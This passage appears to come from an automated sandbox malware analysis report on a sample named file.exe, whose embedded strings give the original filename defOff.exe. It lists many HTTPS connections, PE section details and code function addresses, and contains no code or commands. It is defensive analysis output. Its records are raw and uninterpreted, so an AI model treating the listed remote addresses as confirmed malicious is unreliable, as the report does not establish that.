              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownHTTPS traffic detected: 20.190.160.14:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.150:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.234.120.54:443 -> 192.168.2.6:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.193:443 -> 192.168.2.6:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.193:443 -> 192.168.2.6:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49909 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49941 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49977 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DFE1A0_2_061DFE1A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CEE160_2_061CEE16
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E1E350_2_061E1E35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EA6350_2_061EA635
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E662A0_2_061E662A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CD65A0_2_061CD65A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E2E540_2_061E2E54
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E56540_2_061E5654
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FBE420_2_061FBE42
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DF67D0_2_061DF67D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C867F0_2_061C867F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F76790_2_061F7679
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DC6670_2_061DC667
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F6E650_2_061F6E65
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CCE610_2_061CCE61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CC69D0_2_061CC69D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D46950_2_061D4695
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E66890_2_061E6689
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FDE830_2_061FDE83
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EB6BC0_2_061EB6BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C5EB70_2_061C5EB7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DDED00_2_061DDED0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E2EEB0_2_061E2EEB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E7EE40_2_061E7EE4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F2EE20_2_061F2EE2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D271C0_2_061D271C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DB7170_2_061DB717
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D57300_2_061D5730
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D5F320_2_061D5F32
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EC7290_2_061EC729
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E0F270_2_061E0F27
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F57520_2_061F5752
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E9F510_2_061E9F51
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D17410_2_061D1741
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E3F790_2_061E3F79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EEF620_2_061EEF62
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EF7950_2_061EF795
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F9FBA0_2_061F9FBA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FE7AC0_2_061FE7AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CD7AB0_2_061CD7AB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FAFCC0_2_061FAFCC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E5FEF0_2_061E5FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D1FEB0_2_061D1FEB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F9C000_2_061F9C00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DE4260_2_061DE426
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F1C210_2_061F1C21
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E74560_2_061E7456
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DB4400_2_061DB440
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FC4400_2_061FC440
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E3C7C0_2_061E3C7C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F4C690_2_061F4C69
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DAC9D0_2_061DAC9D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DC48A0_2_061DC48A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D04850_2_061D0485
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D0CB90_2_061D0CB9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E44D50_2_061E44D5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CF4C70_2_061CF4C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CE4C20_2_061CE4C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F8CEC0_2_061F8CEC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FAD100_2_061FAD10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DBD090_2_061DBD09
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F452A0_2_061F452A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C8D210_2_061C8D21
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D2D220_2_061D2D22
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D8D5C0_2_061D8D5C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06202D740_2_06202D74
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F257C0_2_061F257C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C6D700_2_061C6D70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D3D710_2_061D3D71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BBD680_2_061BBD68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F3D670_2_061F3D67
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D35640_2_061D3564
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D9D9C0_2_061D9D9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EAD920_2_061EAD92
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E6D880_2_061E6D88
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BC5850_2_061BC585
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D55BD0_2_061D55BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F85BA0_2_061F85BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C95AC0_2_061C95AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061ED5A50_2_061ED5A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FCDDC0_2_061FCDDC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CB5D70_2_061CB5D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F5DCC0_2_061F5DCC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D7DC10_2_061D7DC1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F95FD0_2_061F95FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E05E70_2_061E05E7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C7A1D0_2_061C7A1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D82180_2_061D8218
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FAA0C0_2_061FAA0C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CFA070_2_061CFA07
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E72010_2_061E7201
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E22350_2_061E2235
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CC2280_2_061CC228
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E12200_2_061E1220
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D9A590_2_061D9A59
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F925A0_2_061F925A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F82540_2_061F8254
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CDA450_2_061CDA45
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F5A680_2_061F5A68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CCA650_2_061CCA65
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EBA940_2_061EBA94
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FDA800_2_061FDA80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D4ABB0_2_061D4ABB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FA2AF0_2_061FA2AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C62AF0_2_061C62AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DCAA00_2_061DCAA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D2AD00_2_061D2AD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F2AC60_2_061F2AC6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EB2FD0_2_061EB2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D131F0_2_061D131F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FD33B0_2_061FD33B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F7B350_2_061F7B35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F0B5C0_2_061F0B5C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DBB7F0_2_061DBB7F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C739F0_2_061C739F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061ECB950_2_061ECB95
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D1B860_2_061D1B86
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E4BB50_2_061E4BB5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EFBA40_2_061EFBA4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E83C80_2_061E83C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D73FD0_2_061D73FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061BDBF70_2_061BDBF7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EEBF20_2_061EEBF2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D63F30_2_061D63F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D68100_2_061D6810
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F50100_2_061F5010
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E280F0_2_061E280F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DB0070_2_061DB007
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FB8220_2_061FB822
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DA0230_2_061DA023
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F184A0_2_061F184A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C906C0_2_061C906C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E486C0_2_061E486C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D08660_2_061D0866
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DC0980_2_061DC098
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F988C0_2_061F988C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F40BB0_2_061F40BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FB0FE0_2_061FB0FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E38EE0_2_061E38EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D78EE0_2_061D78EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DA8E90_2_061DA8E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D30E50_2_061D30E5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F21130_2_061F2113
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061F39330_2_061F3933
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FA9480_2_061FA948
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E41620_2_061E4162
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061ED1890_2_061ED189
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EA9B70_2_061EA9B7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DF1A40_2_061DF1A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061D59A70_2_061D59A7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061DF9A30_2_061DF9A3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C81D80_2_061C81D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CA1D40_2_061CA1D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061EE1D60_2_061EE1D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061CF1CB0_2_061CF1CB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061E99C20_2_061E99C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061FC9F50_2_061FC9F5
              Source: file.exe, 00000000.00000003.2432565315.0000000005F07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425718590.0000000005ECA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425204472.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427123767.0000000005EDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2427956747.0000000005E09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2431002516.0000000006005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
